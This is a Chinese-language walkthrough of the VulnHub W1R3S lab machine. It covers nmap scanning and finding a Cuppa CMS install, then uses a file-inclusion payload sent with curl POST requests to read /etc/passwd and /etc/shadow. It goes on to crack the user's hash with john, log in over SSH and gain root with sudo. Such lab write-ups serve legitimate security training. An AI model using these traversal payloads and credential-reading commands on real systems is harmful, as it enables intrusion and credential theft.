一、靶机配置
1、靶机下载地址
https://www.vulnhub.com/entry/w1r3s-101,220/
2、修改靶机网卡
二、web渗透测试
1、靶机IP扫描
2、靶机IP、端口服务版本扫描
nmap -sS -sV -A -p- 192.168.31.144
发现有ftp的21端口,并且允许匿名用户登录anonymous ,接着就是ssh的22端口,80端口和mysql的3306端口,并且3306端口并不是管理员端口
3、访问靶机主页
4、对靶机进行目录探测
发现了/administrator/index.php,/wordpress/wp-login.php这俩目录
4、拼接访问
拼接/wordpress/wp-login.php,是个登录框
拼接/administrator/installation/
并且是个Cuppa CMS
4、使用whatweb扫描该网址信息
发现网站是Apache2.4.18,Cuppa CMS 搭建的
4、使用searchsploit命令查询Cuppa cms是否存在漏洞
searchsploit cuppa cms
发现一处漏洞,将它下载下来
searchsploit cuppa cms -m 25971.txt
查看25971文件
查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload
4、文件包含漏洞读取任意文件
这里我直接访问/etc/passwd
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
发现访问不到
5、可能是需要post访问,使用curl工具以post方式获取信息
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.31.144/administrator/alerts/alertConfigField.php
成功获取到/etc/passwd内容
发现了w1r3s的用户和root有/bin/bash权限
6、查看/etc/shadow文件,获取密码信息
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.144/administrator/alerts/alertConfigField.php
发现有www-data和w1r3s的加密过的密码,因为只有w1r3s用户有权限,所以主要拿w1r3s的密码来爆破,这里使用kali自带的john工具爆破解密,先将用户和加密的密码复制到一个文本,再爆破
vi 1.txt
john 1.txt
得到密码为computer
7、前面扫描端口,知道22端口开发,尝试连接
ssh w1r3s@192.168.31.144
成功连接
三、提权
1、输入sudo -l 查看此用户权限
发现该用户是全权限
2、直接sudo su 获取root权限
提权成功!!!